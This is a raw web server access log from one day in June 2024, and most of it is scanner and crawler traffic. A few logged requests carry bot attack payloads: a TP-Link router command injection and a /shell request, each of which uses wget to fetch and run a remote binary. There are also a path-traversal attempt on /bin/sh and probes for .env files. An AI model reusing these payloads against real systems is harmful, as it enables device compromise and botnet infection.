195.154.87.70 - - [03/Jun/2024:00:33:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.10.233.90 - - [03/Jun/2024:00:35:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:35:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:36:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:36:58 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:00:37:17 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:00:37:24 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
157.254.164.21 - - [03/Jun/2024:00:39:25 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
3.10.233.90 - - [03/Jun/2024:00:39:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:40:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:40:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:41:23 +0200] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:00:41:42 +0200] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:00:41:53 +0200] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
195.154.87.70 - - [03/Jun/2024:00:42:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.10.233.90 - - [03/Jun/2024:00:44:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:44:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:45:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:46:04 +0200] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:00:46:23 +0200] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:00:46:32 +0200] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:00:49:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
195.154.87.70 - - [03/Jun/2024:00:49:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.10.233.90 - - [03/Jun/2024:00:49:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:49:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:50:42 +0200] "GET /doc/index.html HTTP/1.1" 404 319 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:00:51:04 +0200] "GET /doc/index.html HTTP/1.1" 404 319 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:00:51:12 +0200] "GET /doc/index.html HTTP/1.1" 404 319 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
195.154.87.70 - - [03/Jun/2024:00:51:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.246.255.130 - - [03/Jun/2024:00:52:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
3.10.233.90 - - [03/Jun/2024:00:53:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:54:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:54:26 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:00:55:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:00:56:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:00:56:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
195.154.87.70 - - [03/Jun/2024:00:56:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.94.29.119 - - [03/Jun/2024:01:01:49 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
168.232.15.100 - - [03/Jun/2024:01:07:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
199.188.204.17 - - [03/Jun/2024:01:10:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
78.153.140.177 - - [03/Jun/2024:01:18:04 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.177 - - [03/Jun/2024:01:18:05 +0200] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
197.232.21.221 - - [03/Jun/2024:01:25:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
147.185.132.242 - - [03/Jun/2024:01:28:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
141.98.11.79 - - [03/Jun/2024:01:31:43 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
3.10.233.90 - - [03/Jun/2024:01:33:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:33:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:33:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:34:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:34:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:34:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:34:48 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:34:51 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:34:57 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:35:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:35:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:35:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:35:46 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:35:51 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:35:58 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
141.98.11.79 - - [03/Jun/2024:01:36:33 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
3.10.233.90 - - [03/Jun/2024:01:36:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:36:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:36:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:37:15 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:37:19 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:37:26 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
176.97.210.236 - - [03/Jun/2024:01:38:06 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.238%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
3.10.233.90 - - [03/Jun/2024:01:38:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:38:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:38:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:38:41 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:38:47 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:38:55 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:39:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:39:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:40:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:40:16 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:40:20 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:40:25 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:41:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:41:07 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:41:14 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:41:30 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:41:34 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:41:39 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:42:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:42:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:42:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:42:44 +0200] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:42:48 +0200] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:42:54 +0200] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:43:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:43:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:43:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:44:00 +0200] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:44:03 +0200] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:44:09 +0200] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:44:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:44:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:45:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:45:16 +0200] "GET /doc/index.html HTTP/1.1" 404 319 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:45:20 +0200] "GET /doc/index.html HTTP/1.1" 404 319 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:45:25 +0200] "GET /doc/index.html HTTP/1.1" 404 319 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:46:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:46:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:46:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.10.233.90 - - [03/Jun/2024:01:46:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:46:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
3.10.233.90 - - [03/Jun/2024:01:47:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
195.154.87.70 - - [03/Jun/2024:01:52:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
162.216.149.46 - - [03/Jun/2024:01:52:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.154.87.70 - - [03/Jun/2024:01:59:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.154.87.70 - - [03/Jun/2024:02:04:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.154.87.70 - - [03/Jun/2024:02:09:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.79 - - [03/Jun/2024:02:12:19 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
198.235.24.86 - - [03/Jun/2024:02:14:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.224.128.43 - - [03/Jun/2024:02:29:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [03/Jun/2024:02:31:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [03/Jun/2024:02:46:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
79.110.62.185 - - [03/Jun/2024:02:48:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
185.224.128.43 - - [03/Jun/2024:02:54:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.62.197.8 - - [03/Jun/2024:03:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36"
64.62.156.67 - - [03/Jun/2024:03:01:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
84.20.89.131 - - [03/Jun/2024:03:02:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
64.62.156.66 - - [03/Jun/2024:03:03:31 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Safari/537.36 OPR/80.0.4170.72"
64.62.197.6 - - [03/Jun/2024:03:04:05 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
64.62.156.74 - - [03/Jun/2024:03:04:12 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
64.62.197.15 - - [03/Jun/2024:03:04:49 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36"
35.216.147.113 - - [03/Jun/2024:03:06:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
185.224.128.43 - - [03/Jun/2024:03:06:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
71.6.232.26 - - [03/Jun/2024:03:10:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
71.6.232.26 - - [03/Jun/2024:03:10:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
195.154.87.70 - - [03/Jun/2024:03:11:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
199.188.204.17 - - [03/Jun/2024:03:16:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [03/Jun/2024:03:17:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [03/Jun/2024:03:18:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [03/Jun/2024:03:22:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
41.33.90.229 - - [03/Jun/2024:03:25:17 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
41.33.90.229 - - [03/Jun/2024:03:25:17 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
71.6.232.26 - - [03/Jun/2024:03:28:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
82.80.249.214 - - [03/Jun/2024:03:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/6.1.1 Safari/537.73.11"
82.80.249.156 - - [03/Jun/2024:03:29:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"
185.224.128.43 - - [03/Jun/2024:03:33:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.212 - - [03/Jun/2024:03:33:14 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.212 - - [03/Jun/2024:03:33:14 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.79 - - [03/Jun/2024:03:37:01 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
199.188.204.17 - - [03/Jun/2024:03:42:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.121.69.52 - - [03/Jun/2024:03:49:00 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
